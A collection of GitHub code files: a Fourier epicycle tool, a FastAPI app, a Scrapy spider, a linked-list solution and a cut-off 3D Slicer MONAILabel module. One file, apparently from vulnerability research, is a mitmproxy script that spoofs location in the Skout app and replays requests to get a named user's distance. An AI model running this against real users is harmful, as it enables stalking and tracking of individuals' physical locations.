If the naswers are alwready available for a candidate\n they are read from a pickled file.\n :param doc_folder The folder with the candidate documents.\n :return the list with candidate question' and answers.\n \"\"\"\n if not doc_folder.exists():\n print(f\"Candidate folder {doc_folder} does not exist!\")\n return []\n candidate_list: list[CandidateInfo] = []\n extensions: list[str] = ['**/*.pdf', '**/*.docx']\n for extension in extensions:\n for doc in doc_folder.rglob(extension):\n file_key = doc.stem\n cached_candidate_info = read_saved_candidate_infos(file_key)\n if cached_candidate_info is None:\n docsearch = process_document(doc)\n print(f\"Processed {doc}\")\n if docsearch is not None:\n qa = RetrievalQA.from_chain_type(llm=cfg.llm, chain_type=\"stuff\", retriever=docsearch.as_retriever())\n question_list = []\n for question in questions:\n question_list.append((question, qa.run(question)))\n candidate_info = CandidateInfo(candidate_file=file_key, questions=question_list)\n write_candidate_infos(file_key, candidate_info)\n candidate_list.append(candidate_info)\n else:\n print(f\"Could not retrieve content from {doc}\")\n else:\n candidate_list.append(cached_candidate_info)\n return candidate_list\n\n\ndef render_candidate_infos(candidate_infos: list[CandidateInfo]) -> str:\n \"\"\"\n Receives a list of candidate question and answers and converts them to HTML.\n :param candidate_infos The list of candidate question and answers\n :return an HTML string.\n \"\"\"\n html = \"\"\n for candidate_info in candidate_infos:\n qa_html = \"\"\n for question, answer in candidate_info.questions:\n qa_html += f\"\"\"\n
{question}\n{answer}\n"""\n        html += f"""\n\n                {candidate_info.candidate_file}\n\n                {qa_html}\n
\n\"\"\"\n return html","repo_name":"gilfernandes/document_stuff_playground","sub_path":"document_extract.py","file_name":"document_extract.py","file_ext":"py","file_size_in_byte":7048,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"11271642020","text":"#from libmproxy.protocol.http import decoded\nimport json\nfrom mitmproxy import ctx\n\ndef response(flow):\n #code to handle request flows\n if flow.request.pretty_url.endswith(\"getBroadcastsByNearbySort\"): \n flowDict = {}\n flowDict = flow.response.text\n flowDict = json.loads(flowDict)\n print(flowDict['result']['broadcasts'][0])\n try:\n for user in flowDict['result']['broadcasts']:\n if (user['userDetails']['displayName'] == 'Savagesassy99'):\n print(user['objectId'])\n for userDist in flowDict['result']['metadata']['broadcasts']:\n if(userDist['id'] == user['objectId']):\n print(\"Distance in Km: \",userDist['distanceInKm'])\n except:\n print(\"Error\")\n locDict = json.loads(flow.request.text)\n print(locDict)\n locDict['latitude'] = 53.34104757062299\n locDict['longitude'] = -113.52182336047694\n print(locDict)\n flow = flow.copy()\n flow.request.text = json.dumps(locDict)\n ctx.master.commands.call(\"replay.client\", [flow])","repo_name":"muzmu/Vulnerability-Analysis","sub_path":"Skout/find_request.py","file_name":"find_request.py","file_ext":"py","file_size_in_byte":1144,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"30554912463","text":"from curve import curve\nfrom edge import edge\n# 3rd-party\nimport matplotlib.pyplot as plt\n# Standard\nfrom math import pi, sqrt, ceil\nfrom cmath import exp\nfrom time import sleep\n\n\ndef distance(pt1, pt2):\n '''\n pt1 et pt2 : tuples\n\n return distance(pt1, pt2)\n '''\n return sqrt(((pt1[0] - pt2[0]) ** 2 + (pt1[1] - pt2[1]) ** 2).real)\n\n\ndef periode(pts):\n '''\n pts : liste de points (tuples)\n\n return périmètre de la courbe\n '''\n T = 0\n for i in range(len(pts)):\n T += distance(pts[i], pts[i - 1])\n return T\n\n\ndef geogebra(pts, T, N=20, p=0):\n '''\n pts : courbe : liste de points (tuples)\n T : période/périmètre de la courbe pts\n N : nombre de coefficients de fourier / nombre de cercle + 1\n p : module minimal de la partie réele des coefficients / rayon minimal des cercles\n\n print instructions de construction geogebra\n '''\n # Calcul des coefficients\n N //= 2\n coef = [c(k, pts, T) for k in range(-N, N + 1)]\n\n # Période\n print(f'Ne pas oublier t de période {ceil(T)} et show trace')\n\n # Centres des cercles\n print('C0 = 0 + 0ί')\n indexes = [0]\n for k in range(2 * N + 1):\n if abs(coef[k].real) > p:\n print(f'C{k+1} = C{indexes[-1]} + ({coef[k].real:.20f} + {coef[k].imag:.20f}ί) * exp({-(k - N)} / {T:.20f} * 2 * π * t * ί)')\n indexes.append(k + 1)\n\n # Cercles\n for k in range(1, len(indexes)):\n print(f'Circle(C{indexes[k - 1]}, C{indexes[k]})')\n\n\ndef equation(pts, T, N=20, p=0):\n '''\n pts : courbe : liste de points (tuples)\n T : période/périmètre de la courbe pts\n N : nombre de coefficients de fourier / nombre de cercle + 1\n p : module minimal de la partie réele des coefficients / rayon minimal des cercles\n\n print équation de l'épicycloïde\n '''\n N //= 2\n return ' + '.join([f'({c(k, pts, T).real:.20f} + {c(k, pts, T).imag:.20f}ί)' + f' * ℯ^(-ί * {2 * k / T * pi:.20f} * t)' if abs(c(k, pts, T).real) > p else 'a' for k in range(-N, N + 1)]).replace('a + ', '').replace('+ a', '')\n\n\ndef fourier_iter(ts, pts, T, N=20, 
p=0):\n '''\n ts : liste de valeurs pour t\n pts : courbe : liste de points (tuples)\n T : période/périmètre de la courbe pts\n N : nombre de coefficients de fourier / nombre de cercle + 1\n p : module minimal de la partie réele des coefficients / rayon minimal des cercles\n\n return liste points approximant la courbe\n '''\n N //= 2\n coef = [c(k, pts, T) for k in range(-N, N + 1)]\n return [sum([coef[k + N] * exp(complex(0, 2 * pi * k / T * t)) if abs(coef[k + N].real) > p else 0 for k in range(-N, N + 1)]) for t in ts]\n\n\ndef fourier(t, pts, T, N=20, p=0):\n '''\n t : paramètre de l'épicycloïde\n pts : courbe : liste de points (tuples)\n T : période/périmètre de la courbe pts\n N : nombre de coefficients de fourier / nombre de cercle + 1\n p : module minimal de la partie réele des coefficients / rayon minimal des cercles\n\n return liste points approximant la courbe\n '''\n N //= 2\n return sum(c(k, pts, T) * exp(complex(0, 2 * pi * k / T * t)) if abs(c(k, pts, T).real) > p else 0 for k in range(-N, N + 1))\n\n\ndef c(k, pts, T):\n '''\n k : indice du coefficient de fourier\n pts : courbe : liste de points (tuples)\n T : période/périmètre de la courbe pts\n\n return k-ième coefficient de fourier\n '''\n coefs = 0\n t = 0\n n = 0\n while t < T and n < len(pts):\n try:\n dt = distance(pts[n], pts[n + 1])\n except IndexError:\n dt = distance(pts[0], pts[-1])\n coefs += dt * exp(complex(0, -k * t * 2 * pi / T)) * complex(pts[n][0], pts[n][1])\n n += 1\n t += dt\n return coefs / T\n\n\nif __name__ == '__main__':\n nb_cercles = 50\n rayon_minimal = 0\n path = 'ens.png'\n\n print(\"Détection d'un bord et des coordonnés de la courbe.\")\n pts = curve(edge(path))\n\n print(\"Séparation des x et y.\")\n ptsx = [pt[0] for pt in pts]\n ptsy = [pt[1] for pt in pts]\n\n print(\"Calcul de la période.\")\n T = periode(pts)\n\n print(\"Échantillonage des ts.\")\n p = 1 # précision\n ts = [t / p for t in range(ceil(T * p) + 1)]\n\n print(\"Calcul des affixes des pts de la série de fourier complexe de la courbe.\")\n zs = fourier_iter(ts, pts, T, N=nb_cercles, p=rayon_minimal)\n\n print(\"Séparation des x et y.\")\n xs = list(map(lambda z: z.real, zs))\n ys = list(map(lambda z: z.imag, zs))\n\n print(\"Affichage des courbes.\")\n plt.subplot(2, 1, 1)\n plt.scatter(ptsx, ptsy, s=1)\n plt.subplot(2, 1, 2)\n plt.scatter(xs, ys, s=1)\n plt.show()\n\n # Pour s'assurer que la fenêtre du graphique est bien fermée.\n sleep(0.2)\n\n print(\"Affichage des instructions et de l'équation de l'épicycloïde.\")\n geogebra(pts, T, nb_cercles, rayon_minimal)\n print(equation(pts, T, nb_cercles, rayon_minimal))\n\n","repo_name":"gabriel-doriath-dohler/Convertisseur-en-epicycloide","sub_path":"fourier.py","file_name":"fourier.py","file_ext":"py","file_size_in_byte":4902,"program_lang":"python","lang":"fr","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"31538139743","text":"from fastapi import FastAPI\nfrom fastapi.middleware.cors import CORSMiddleware\n\nfrom api.routers import api\nfrom api.settings import settings\n\napp = FastAPI()\n\norigins = [\n \"http://localhost:3000\",\n]\n\nif settings.is_dev:\n app.add_middleware(\n CORSMiddleware,\n allow_origins=origins,\n allow_credentials=True,\n allow_methods=[\"*\"],\n allow_headers=[\"*\"],\n )\n\napp.include_router(api.router)\n\n\n@app.get(\"/\")\nasync def root():\n return {\"message\": \"Hello 
World\"}\n","repo_name":"Lazytangent/Qwerkey","sub_path":"api/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":503,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"54"} +{"seq_id":"37866431992","text":"#!/bin/usr/python3\n'''Defines a state model'''\n\nfrom sqlalchemy import Column, Integer, String\nfrom sqlalchemy.ext.declarative import declarative_base\n\nBase = declarative_base()\n\nclass State(Base):\n '''instanciating class states.'''\n __tablename__ = 'states'\n\n id = Column(Integer, primary_key=True)\n name = Column(String(128), nullable=False)\n","repo_name":"Erickkaranja/alx-higher_level_programming","sub_path":"0x0F-python-object_relational_mapping/model_state.py","file_name":"model_state.py","file_ext":"py","file_size_in_byte":356,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"2800775662","text":"# Definition for singly-linked list.\n# class ListNode(object):\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\nclass Solution(object):\n def removeNthFromEnd(self, head, n):\n \"\"\"\n :type head: ListNode\n :type n: int\n :rtype: ListNode\n \"\"\"\n fake_head = ListNode(0)\n tmp_node = fake_head\n for i in range(n):\n tmp_node.next = ListNode(0)\n tmp_node = tmp_node.next\n pre_head = tmp_node\n tmp_node.next = head\n pos1 = fake_head\n pos2 = head\n while pos2 is not None:\n pos1 = pos1.next\n pos2 = pos2.next\n pos1.next = pos1.next.next\n return pre_head.next","repo_name":"Vspick/python_interview","sub_path":"leetcode/remove-nth-node-from-end-of-list.py","file_name":"remove-nth-node-from-end-of-list.py","file_ext":"py","file_size_in_byte":727,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"11548085252","text":"# -*- coding: utf-8 -*-\nimport scrapy\nfrom scrapy.linkextractors import LinkExtractor\nfrom scrapy.spiders import CrawlSpider, Rule\nfrom scrapy.http import Request\n\nfrom renrenyingshi.items import RenrenDetailItem\n\nclass RenrenSpider(CrawlSpider):\n name = 'renren'\n allowed_domains = ['zimuzu.tv']\n start_urls = ['http://www.zimuzu.tv/resourcelist',]\n rules = (\n Rule(LinkExtractor(\n allow=r'/resourcelist/\\?page=\\d+&channel=&area=&category=&year=&tvstation=&sort='),\n callback='parse_movie_list', follow=True, process_links='movie_list_url'),\n )\n\n def parse_movie_list(self, response):\n \"\"\"解析电影列表页\n \"\"\"\n movies = response.xpath(\n \".//div[@class='resource-showlist has-point']/ul/li[@class='clearfix']\")\n for movie in movies:\n url = movie.xpath(\n \"./div[@class='fl-img']/a/@href\").extract_first()\n movie_url = r'http://www.zimuzu.tv%s' % url\n movie_id = movie_url.split(r'/')[-1]\n request = scrapy.Request(\n url=movie_url, callback=self.parse_movie_detail)\n request.meta['movie_id'] = movie_id\n yield request\n\n def parse_movie_detail(self, response):\n \"\"\"解析电影内容页\n \"\"\"\n # from scrapy.shell import inspect_response\n # inspect_response(response, self)\n title = response.xpath(\n \"//div[@class='resource-tit']/h2/text()\").extract_first().strip('\"')\n movie_id = response.meta['movie_id']\n movie_url = response.url\n name = response.xpath(\n \".//div[@class='fl-info']/ul/li[1]/strong/text()\").extract_first()\n local = response.xpath(\n \".//div[@class='fl-info']/ul/li[2]/strong/text()\").extract_first()\n language = response.xpath(\n \".//div[@class='fl-info']/ul/li[3]/strong/text()\").extract_first()\n premiere = response.xpath(\n 
\".//div[@class='fl-info']/ul/li[4]/strong/text()\").extract_first()\n company = response.xpath(\n \".//div[@class='fl-info']/ul/li[5]/strong/text()\").extract_first()\n if company is None:\n company = u'未知'\n types = response.xpath(\n \".//div[@class='fl-info']/ul/li[6]/strong/text()\").extract_first()\n renren_detail_item = RenrenDetailItem(\n title=title, movie_id=movie_id, movie_url=movie_url, name=name,\n local=local,language=language, premiere=premiere, company=company,\n types=types,\n )\n yield renren_detail_item\n\n def movie_list_url(self, url_list):\n \"\"\"补全链接地址\n \"\"\"\n new_url_list = []\n if url_list is None:\n return\n for l in url_list:\n new_url = r'http://www.zimuzu.tv%s' % l\n new_url_list.append(new_url)\n return new_url_list\n","repo_name":"sealionking/renrenspider","sub_path":"renrenyingshi/renrenyingshi/spiders/renren_spider.py","file_name":"renren_spider.py","file_ext":"py","file_size_in_byte":2928,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"39563673981","text":"import datetime\nimport logging\nimport os\nimport re\nimport tempfile\nfrom typing import Dict, List\n\nimport qt\nimport requests\nimport SampleData\nimport slicer\nfrom MONAILabelReviewerLib.ImageData import ImageData\nfrom MONAILabelReviewerLib.ImageDataController import ImageDataController\nfrom MONAILabelReviewerLib.MONAILabelReviewerEnum import Level, SegStatus\nfrom slicer.ScriptedLoadableModule import *\nfrom slicer.util import VTKObservationMixin\n\n\nclass MONAILabelReviewer(ScriptedLoadableModule):\n \"\"\"Uses ScriptedLoadableModule base class, available at:\n https://github.com/Slicer/Slicer/blob/master/Base/Python/slicer/ScriptedLoadableModule.py\n \"\"\"\n\n def __init__(self, parent):\n ScriptedLoadableModule.__init__(self, parent)\n self.parent.title = \"MONAILabel Reviewer\"\n self.parent.categories = [\"Active Learning\"]\n self.parent.dependencies = []\n self.parent.contributors = [\"Minh Duc, Do (rAIdiance)\"]\n self.parent.helpText = \"\"\"\nThis module provides the user to review on segmentations on X-Ray-dicom images.\nSee more information in module documentation.\n\"\"\"\n self.parent.acknowledgementText = \"\"\"\nDeveloped by rAiDiance, and funded by Berlin Institute of Health (BIH).\n\"\"\"\n\n\nclass MONAILabelReviewerWidget(ScriptedLoadableModuleWidget, VTKObservationMixin):\n \"\"\"Uses ScriptedLoadableModuleWidget base class, available at:\n https://github.com/Slicer/Slicer/blob/master/Base/Python/slicer/ScriptedLoadableModule.py\n \"\"\"\n\n def __init__(self, parent=None):\n \"\"\"\n Called when the user opens the module the first time and the widget is initialized.\n \"\"\"\n ScriptedLoadableModuleWidget.__init__(self, parent)\n VTKObservationMixin.__init__(self) # needed for parameter node observation\n self.logic = None\n self._parameterNode = None\n self._updatingGUIFromParameterNode = False\n\n self.STATUS = SegStatus()\n self.LEVEL = Level()\n\n self.selectedReviewer: str = \"\"\n self.selectedClientId: str = \"\"\n self.listImageData: List[ImageData] = None\n self.imageCounter: int = 0\n self.currentImageData: ImageData = None\n self.idToimageData: Dict[str, ImageData] = None\n\n # Meta Information\n self.finalStatus: str = \"\"\n self.finalLevel: str = \"\"\n self.finalComment: str = \"\"\n\n self.reviewersModeIsActive = False\n\n self.mapFiltersToBool: Dict[str, bool] = {\n \"segmented\": False,\n \"notSegemented\": False,\n \"approved\": False,\n \"flagged\": False,\n }\n\n def setup(self):\n 
\"\"\"\n Called when the user opens the module the first time and the widget is initialized.\n \"\"\"\n ScriptedLoadableModuleWidget.setup(self)\n\n # Load widget from .ui file (created by Qt Designer).\n # Additional widgets can be instantiated manually and added to self.layout.\n uiWidget = slicer.util.loadUI(self.resourcePath(\"UI/MONAILabelReviewer.ui\"))\n self.layout.addWidget(uiWidget)\n self.ui = slicer.util.childWidgetVariables(uiWidget)\n\n # Set scene in MRML widgets. Make sure that in Qt designer the top-level qMRMLWidget's\n # \"mrmlSceneChanged(vtkMRMLScene*)\" signal in is connected to each MRML widget's.\n # \"setMRMLScene(vtkMRMLScene*)\" slot.\n uiWidget.setMRMLScene(slicer.mrmlScene)\n\n # Create logic class. Logic implements all computations that should be possible to run\n # in batch mode, without a graphical user interface.\n self.logic = MONAILabelReviewerLogic()\n\n self.setLightVersion()\n self.segmentEditorWidget = slicer.qMRMLSegmentEditorWidget()\n self.addSegmentator()\n self.ui.verticalLayout_10.addWidget(self.segmentEditorWidget)\n self.loadServerSelection()\n\n # Section: Widget Elements\n self.ui.btn_connect_monai.clicked.connect(self.init_dicom_stream)\n self.ui.btn_load.clicked.connect(self.loadImageData)\n\n self.ui.btn_approved.clicked.connect(self.approveSegmentation)\n self.ui.btn_mark_revision.clicked.connect(self.flagSegmentation)\n\n self.ui.btn_next.clicked.connect(self.getNextSegmentation)\n self.ui.btn_previous.clicked.connect(self.getPreviousSegmenation)\n\n self.ui.btn_easy.clicked.connect(self.setEasy)\n self.ui.btn_medium.clicked.connect(self.setMedium)\n self.ui.btn_hard.clicked.connect(self.setHard)\n\n self.ui.btn_search.clicked.connect(self.search)\n self.ui.btn_search_annotator_reviewer.clicked.connect(self.searchByAnnotatorReviewer)\n self.ui.btn_search_level.clicked.connect(self.searchByLevel)\n\n self.ui.checkBox_search_approved.clicked.connect(self.checkedAppprovedSearch)\n self.ui.checkBox_search_flagged.clicked.connect(self.checkedFlaggedSearch)\n\n self.ui.btn_show_image.clicked.connect(self.showSearchedImage)\n\n self.ui.checkBox_flagged.clicked.connect(self.checkedFlagged)\n self.ui.checkBox_approved.clicked.connect(self.checkApproved)\n self.ui.checkBox_not_segmented.clicked.connect(self.checkNotSegmented)\n self.ui.checkBox_segmented.clicked.connect(self.checkSegmented)\n\n self.ui.btn_basic_mode.clicked.connect(self.setLightVersion)\n self.ui.btn_reviewers_mode.clicked.connect(self.setReviewerVersion)\n self.ui.comboBox_clients.currentIndexChanged.connect(self.index_changed)\n self.ui.comboBox_reviewers.currentIndexChanged.connect(self.indexReviewerchanged)\n\n def getCurrentTime(self):\n return datetime.datetime.now()\n\n def cleanup(self):\n \"\"\"\n Called when the application closes and the module widget is destroyed.\n \"\"\"\n self.removeObservers()\n\n def indexReviewerchanged(self, index):\n logging.info(f\"{self.getCurrentTime()}: Selected reviewer: '{self.ui.comboBox_reviewers.currentText}'\")\n self.selectedReviewer = self.ui.comboBox_reviewers.currentText\n\n def index_changed(self, index):\n self.loadImageData()\n\n def setReviewerVersion(self):\n self.reviewersModeIsActive = True\n # section: Server\n # Reviewer Field\n self.ui.label_20.show()\n self.ui.comboBox_reviewers.show()\n\n # Approved bar\n self.ui.label_17.show()\n self.ui.progressBar_approved_total.show()\n self.ui.label_idx_appr_image.show()\n\n # section: Data set explorer\n\n # Approved bar\n self.ui.label_10.show()\n 
self.ui.progressBar_approved_client.show()\n self.ui.label_idx_appr_image_client.show()\n\n # filter option\n self.ui.label_6.show()\n self.ui.checkBox_not_segmented.show()\n self.ui.checkBox_flagged.show()\n self.ui.checkBox_segmented.show()\n self.ui.checkBox_approved.show()\n\n # section: Data evaluation\n self.ui.btn_easy.show()\n self.ui.btn_medium.show()\n self.ui.btn_hard.show()\n self.ui.label_level_difficulty.show()\n self.ui.btn_mark_revision.show()\n self.ui.btn_approved.show()\n\n # imag information\n self.ui.label_14.show()\n self.ui.lineEdit_status.show()\n self.ui.label_16.show()\n self.ui.lineEdit_level.show()\n self.ui.plainText_comment.show()\n if self.ui.btn_basic_mode.isChecked():\n self.ui.btn_basic_mode.setChecked(False)\n\n self.collapseAllSecions()\n\n # Section: Light version Option\n\n def setLightVersion(self):\n self.reviewersModeIsActive = False\n # section: Server\n # Reviewer Field\n self.ui.label_20.hide()\n self.ui.comboBox_reviewers.hide()\n\n # Approved bar\n self.ui.label_17.hide()\n self.ui.progressBar_approved_total.hide()\n self.ui.label_idx_appr_image.hide()\n\n # section: Data set explorer\n\n # Approved bar\n self.ui.label_10.hide()\n self.ui.progressBar_approved_client.hide()\n self.ui.label_idx_appr_image_client.hide()\n\n # filter option\n self.ui.label_6.hide()\n self.ui.checkBox_not_segmented.hide()\n self.ui.checkBox_flagged.hide()\n self.ui.checkBox_segmented.hide()\n self.ui.checkBox_approved.hide()\n\n # section: Data evaluation\n self.ui.btn_easy.hide()\n self.ui.btn_medium.hide()\n self.ui.btn_hard.hide()\n self.ui.label_level_difficulty.hide()\n self.ui.btn_mark_revision.hide()\n self.ui.btn_approved.hide()\n\n # imag information\n self.ui.label_14.hide()\n self.ui.lineEdit_status.hide()\n self.ui.label_16.hide()\n self.ui.lineEdit_level.hide()\n self.ui.plainText_comment.hide()\n if self.ui.btn_reviewers_mode.isChecked():\n self.ui.btn_reviewers_mode.setChecked(False)\n\n self.collapseAllSecions()\n\n def cleanCache(self):\n self.logic = MONAILabelReviewerLogic()\n self.selectedReviewer = \"\"\n self.selectedClientId = \"\"\n self.listImageData = None\n self.imageCounter = 0\n self.currentImageData = None\n self.idToimageData = None\n\n # Meta Information\n self.finalStatus = \"\"\n self.finalLevel = \"\"\n self.finalComment = \"\"\n logging.info(f\"{self.getCurrentTime()}: Cache is cleaned\")\n\n # Section: Server\n def loadServerSelection(self):\n settings = qt.QSettings()\n serverUrlHistory = settings.value(\"MONAILabel/serverUrlHistory\")\n\n self.ui.comboBox_server_url.clear()\n self.ui.comboBox_server_url.addItems(serverUrlHistory.split(\";\"))\n\n def init_dicom_stream(self):\n \"\"\"\n initiates connection to monai server\n Default: client listens on \"http://127.0.0.1:8000\"\n \"\"\"\n # Check Connection\n self.cleanCache()\n serverUrl: str = self.ui.comboBox_server_url.currentText\n isConnected: bool = self.logic.connectToMonaiServer(serverUrl)\n if not isConnected:\n warningMessage = f\"Connection to server failed \\ndue to invalid ip '{serverUrl}'\"\n slicer.util.warningDisplay(warningMessage)\n return\n result = self.logic.initMetaDataProcessing()\n if result is False:\n warningMessage = (\n \"Request for datastore-info failed.\\nPlease check if server address is correct \\n('{}')!\".format(\n serverUrl\n )\n )\n slicer.util.warningDisplay(warningMessage)\n return\n self.initUI()\n\n def collapseAllSecions(self):\n self.ui.collapsibleButton_search_image.enabled = False\n self.ui.collapsibleButton_dicom_stream.enabled = 
False\n self.ui.collapsibleButton_dicom_evaluation.enabled = False\n\n self.ui.collapsibleButton_search_image.collapsed = True\n self.ui.collapsibleButton_dicom_stream.collapsed = True\n self.ui.collapsibleButton_dicom_evaluation.collapsed = True\n\n def initUI(self):\n\n self.selectedReviewer = self.ui.comboBox_reviewers.currentText\n if self.reviewersModeIsActive and self.selectedReviewer == \"\":\n warningMessage = \"Missing reviewer's name.\\nPlease enter your id or name in the reviewer's field!\"\n slicer.util.warningDisplay(warningMessage)\n return\n self.ui.collapsibleButton_search_image.enabled = True\n self.ui.collapsibleButton_dicom_stream.enabled = True\n\n # set Segmentation progress bar\n self.setProgessBar()\n\n # fill combobox\n self.fillComboBoxes()\n\n # set up buttons\n self.setButtons()\n\n self.selectedClientId = \"\"\n\n def setButtons(self):\n self.ui.btn_approved.setCheckable(True)\n self.ui.btn_mark_revision.setCheckable(True)\n self.ui.btn_easy.setCheckable(True)\n self.ui.btn_medium.setCheckable(True)\n self.ui.btn_hard.setCheckable(True)\n self.ui.btn_reviewers_mode.setCheckable(True)\n self.ui.btn_basic_mode.setCheckable(True)\n self.ui.btn_show_image.enabled = False\n\n def setProgessBar(self):\n progessBarData = self.logic.getStatistics()\n self.ui.progressBar_segmentation.setProperty(\"value\", progessBarData[\"segmentationProgress\"])\n self.ui.label_idx_seg_image.setText(progessBarData[\"idxTotalSegmented\"])\n self.ui.label_idx_appr_image.setText(progessBarData[\"idxTotalApproved\"])\n self.ui.progressBar_approved_total.setProperty(\"value\", progessBarData[\"progressPercentage\"])\n\n def fillComboBoxes(self):\n # clients\n clientIds = self.logic.getClientIds()\n\n self.ui.comboBox_clients.clear()\n self.ui.comboBox_clients.addItem(\"All\")\n for clientId in clientIds:\n self.ui.comboBox_clients.addItem(str(clientId))\n\n # combobox in search section\n self.ui.comboBox_search_annotator.clear()\n self.ui.comboBox_search_annotator.addItem(\"All\")\n for clientId in clientIds:\n self.ui.comboBox_search_annotator.addItem(str(clientId))\n\n # reviewers\n reviewers = self.logic.getReviewers()\n self.ui.comboBox_reviewers.addItem(self.selectedReviewer)\n for reviewer in reviewers:\n if reviewer == self.selectedReviewer:\n continue\n self.ui.comboBox_reviewers.addItem(str(reviewer))\n\n # combobox in search section\n self.ui.comboBox_search_reviewer.addItem(\"All\")\n for reviewer in reviewers:\n self.ui.comboBox_search_reviewer.addItem(str(reviewer))\n\n def cleanDicomStreamSection(self):\n self.finalStatus = \"\"\n self.finalLevel = \"\"\n self.finalComment = \"\"\n\n self.selectedClientId = None\n self.imageCounter = 0\n self.currentImageData = None\n self.idToimageData = None\n self.listImageData = None\n\n self.cleanProgressBarDicomStreamSection()\n self.cleanCheckBoxes()\n self.resetHorizontalSlider()\n\n # Section: Loading images\n def loadImageData(self):\n if (self.selectedClientId == self.ui.comboBox_clients.currentText) and (self.isDifferentFilter() is False):\n return\n self.imageCounter = 0\n\n self.cleanSearchSection()\n # select segmentator: ALL\n self.selectedClientId = self.ui.comboBox_clients.currentText\n if self.selectedClientId == \"All\":\n self.listImageData = self.loadImageDataWithFilter(selectedClientId=\"\")\n self.ui.checkBox_segmented.setEnabled(True)\n self.ui.checkBox_not_segmented.setEnabled(True)\n self.setProgressBarOfAll()\n\n # select segmentator: client was selected\n if self.selectedClientId != \"All\":\n self.listImageData = 
self.loadImageDataWithFilter(selectedClientId=self.selectedClientId)\n self.setCheckBoxesClient()\n self.setProgressBarOfClient(self.selectedClientId)\n\n logging.info(\n \"{}: Successfully loaded Image data [total = {}, category = '{}']\".format(\n self.getCurrentTime(), len(self.listImageData), self.selectedClientId\n )\n )\n\n if len(self.listImageData) > 0:\n self.currentImageData = self.listImageData[self.imageCounter]\n self.loadNextImage(self.currentImageData)\n\n self.ui.collapsibleButton_dicom_evaluation.enabled = True\n self.ui.collapsibleButton_dicom_evaluation.collapsed = False\n self.setHorizontalSlider(len(self.listImageData))\n self.collectFilters()\n self.setLoadButtonColor(reload=False)\n\n def loadImageDataWithFilter(self, selectedClientId: str) -> list:\n isApproved = bool(self.ui.checkBox_approved.isChecked())\n isFlagged = bool(self.ui.checkBox_flagged.isChecked())\n isNotSegmented = bool(self.ui.checkBox_not_segmented.isChecked())\n segmented = bool(self.ui.checkBox_segmented.isChecked())\n logging.info(\n \"{}: Selected filters: segmented= {} | isNotSegmented= {} | isApproved= {} | isFlagged= {}\".format(\n self.getCurrentTime(), segmented, isNotSegmented, isApproved, isFlagged\n )\n )\n if selectedClientId == \"\":\n return self.logic.getAllImageData(segmented, isNotSegmented, isApproved, isFlagged)\n return self.logic.getImageDataByClientId(selectedClientId, isApproved, isFlagged)\n\n def setProgressBarOfAll(self):\n progessBarData = self.logic.getStatistics()\n # Progress bar: Segmented/TotalImage\n self.ui.progressBar_segmented_client.setProperty(\"value\", progessBarData[\"segmentationProgressAllPercentage\"])\n self.ui.label_idx_seg_image_client.setText(progessBarData[\"idxTotalSegmented\"])\n # Progress bar: approvalCount/TotalImage\n self.ui.progressBar_approved_client.setProperty(\"value\", progessBarData[\"approvalProgressPercentage\"])\n self.ui.label_idx_appr_image_client.setText(progessBarData[\"idxTotalApproved\"])\n\n def cleanProgressBarDicomStreamSection(self):\n self.ui.progressBar_segmented_client.setProperty(\"value\", 0)\n self.ui.progressBar_approved_client.setProperty(\"value\", 0)\n self.ui.label_idx_seg_image_client.setText(\"x/y\")\n self.ui.label_idx_appr_image_client.setText(\"x/y\")\n\n def setLoadButtonColor(self, reload: bool):\n if reload: # reload required\n self.ui.btn_load.setStyleSheet(\"background-color : rgb(169, 169, 169)\")\n return\n self.ui.btn_load.setStyleSheet(\"background-color : rgb(0, 144, 81)\")\n\n def setProgressBarOfClient(self, selectedClientId: str):\n percentageApprovedOfClient, idxApprovedOfClient = self.logic.getPercentageApproved(selectedClientId)\n self.ui.progressBar_approved_client.setProperty(\"value\", percentageApprovedOfClient)\n self.ui.label_idx_appr_image_client.setText(idxApprovedOfClient)\n\n percentageSemgmentedByClient, idxSegmentedByClient = self.logic.getPercentageSemgmentedByClient(\n selectedClientId\n )\n self.ui.progressBar_segmented_client.setProperty(\"value\", percentageSemgmentedByClient)\n self.ui.label_idx_seg_image_client.setText(idxSegmentedByClient)\n\n def setHorizontalSlider(self, loadesImageCount: int):\n self.ui.horizontalSlider_image_idx.setMinimum(0)\n self.ui.horizontalSlider_image_idx.setMaximum(loadesImageCount - 1)\n idxImage = f\"Image: {self.imageCounter + 1}/{len(self.listImageData)}\"\n self.ui.label_idx_image.setText(idxImage)\n\n def updateHorizontalSlider(self):\n self.ui.horizontalSlider_image_idx.setValue(self.imageCounter)\n idxImage = f\"Image: 
{self.imageCounter + 1}/{len(self.listImageData)}\"\n self.ui.label_idx_image.setText(idxImage)\n\n def resetHorizontalSlider(self):\n self.ui.horizontalSlider_image_idx.setValue(1)\n self.ui.label_idx_image.setText(\"Image:\")\n\n # Section: Filter\n def collectFilters(self):\n self.mapFiltersToBool[\"segmented\"] = self.ui.checkBox_segmented.isChecked()\n self.mapFiltersToBool[\"notSegemented\"] = self.ui.checkBox_not_segmented.isChecked()\n self.mapFiltersToBool[\"approved\"] = self.ui.checkBox_approved.isChecked()\n self.mapFiltersToBool[\"flagged\"] = self.ui.checkBox_flagged.isChecked()\n\n def isDifferentFilter(self) -> bool:\n if self.mapFiltersToBool[\"segmented\"] != self.ui.checkBox_segmented.isChecked():\n return True\n if self.mapFiltersToBool[\"notSegemented\"] != self.ui.checkBox_not_segmented.isChecked():\n return True\n if self.mapFiltersToBool[\"approved\"] != self.ui.checkBox_approved.isChecked():\n return True\n if self.mapFiltersToBool[\"flagged\"] != self.ui.checkBox_flagged.isChecked():\n return True\n return False\n\n # CheckBox: clean\n def cleanCheckBoxes(self):\n self.ui.checkBox_segmented.setChecked(False)\n self.ui.checkBox_not_segmented.setChecked(False)\n self.ui.checkBox_flagged.setChecked(False)\n self.ui.checkBox_approved.setChecked(False)\n\n # CheckBox: 